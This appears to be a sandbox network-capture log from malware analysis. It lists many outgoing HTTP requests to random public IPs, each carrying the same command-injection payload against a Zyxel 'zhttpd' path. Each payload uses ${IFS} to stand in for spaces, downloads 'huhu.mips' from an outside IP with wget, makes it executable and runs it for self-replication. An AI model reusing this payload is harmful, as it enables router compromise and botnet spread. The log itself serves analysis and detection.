                                              Jan 29, 2024 07:04:04.293056965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7800192.168.2.1454108216.89.235.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293092012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7801192.168.2.144307240.120.204.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293126106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7802192.168.2.1437134128.144.25.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293180943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7803192.168.2.145643231.56.180.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293215036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7804192.168.2.1454206150.103.117.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293272018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7805192.168.2.143640043.204.204.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293292046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7806192.168.2.1448170126.156.220.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293337107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7807192.168.2.1435888206.168.201.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293369055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7808192.168.2.1445184196.6.229.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293414116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7809192.168.2.145131413.3.9.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293466091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7810192.168.2.14427488.162.3.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293498039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7811192.168.2.1444796202.87.136.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293540955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7812192.168.2.1438220200.37.245.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293593884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7813192.168.2.1458564194.216.170.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293642044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7814192.168.2.144076424.9.174.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293659925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7815192.168.2.1450218146.214.171.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293694973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7816192.168.2.1436828221.82.36.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293714046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7817192.168.2.146050682.234.20.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293778896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7818192.168.2.1443340189.128.241.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293804884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7819192.168.2.1452636186.217.108.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293834925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7820192.168.2.1454938144.245.84.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293884993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7821192.168.2.144924484.75.139.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293911934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7822192.168.2.1444116210.212.44.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.293947935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7823192.168.2.1440864221.73.141.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294023991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7824192.168.2.1442448186.92.217.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294056892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7825192.168.2.1433768121.120.248.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294107914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7826192.168.2.1448224116.188.170.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294137001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7827192.168.2.1448406202.220.152.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294161081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7828192.168.2.145613087.231.168.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294190884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7829192.168.2.1454978166.10.79.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294245958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7830192.168.2.143544847.179.127.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294306040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7831192.168.2.1455006177.158.183.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294322014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7832192.168.2.1443754182.111.167.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294367075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7833192.168.2.145491689.124.110.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294377089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7834192.168.2.144085440.104.250.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294409037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7835192.168.2.144600688.75.115.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294450998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7836192.168.2.143754843.151.49.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294485092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7837192.168.2.1451424119.229.169.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294503927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7838192.168.2.144689067.106.210.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294538021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7839192.168.2.1459894213.109.127.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294586897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7840192.168.2.143774834.129.186.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294620991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7841192.168.2.1439968137.129.237.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294631004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7842192.168.2.145457636.193.2.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294655085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7843192.168.2.145885817.239.185.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294699907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7844192.168.2.1432804196.174.50.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294723988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7845192.168.2.1452018203.37.122.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294784069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7846192.168.2.143312623.226.218.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294815063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7847192.168.2.143881069.47.117.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294837952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7848192.168.2.1443842200.86.37.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294895887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7849192.168.2.143970639.201.35.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294924974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7850192.168.2.145819881.184.30.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294950962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7851192.168.2.144687052.210.69.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.294991970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7852192.168.2.145803890.65.220.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295017958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7853192.168.2.1450750219.58.157.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295073032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7854192.168.2.145272097.45.128.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295114040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7855192.168.2.1449608118.212.226.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295161009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7856192.168.2.1454274132.119.152.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295186043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7857192.168.2.145053648.121.72.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295205116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7858192.168.2.145728440.100.225.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295255899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7859192.168.2.1455294180.181.239.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295295000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7860192.168.2.144224243.104.92.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295351982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7861192.168.2.1450918211.68.192.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295388937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7862192.168.2.1438446155.122.148.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295422077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7863192.168.2.144787063.243.0.105443
                                              TimestampBytes transferredDirectionData
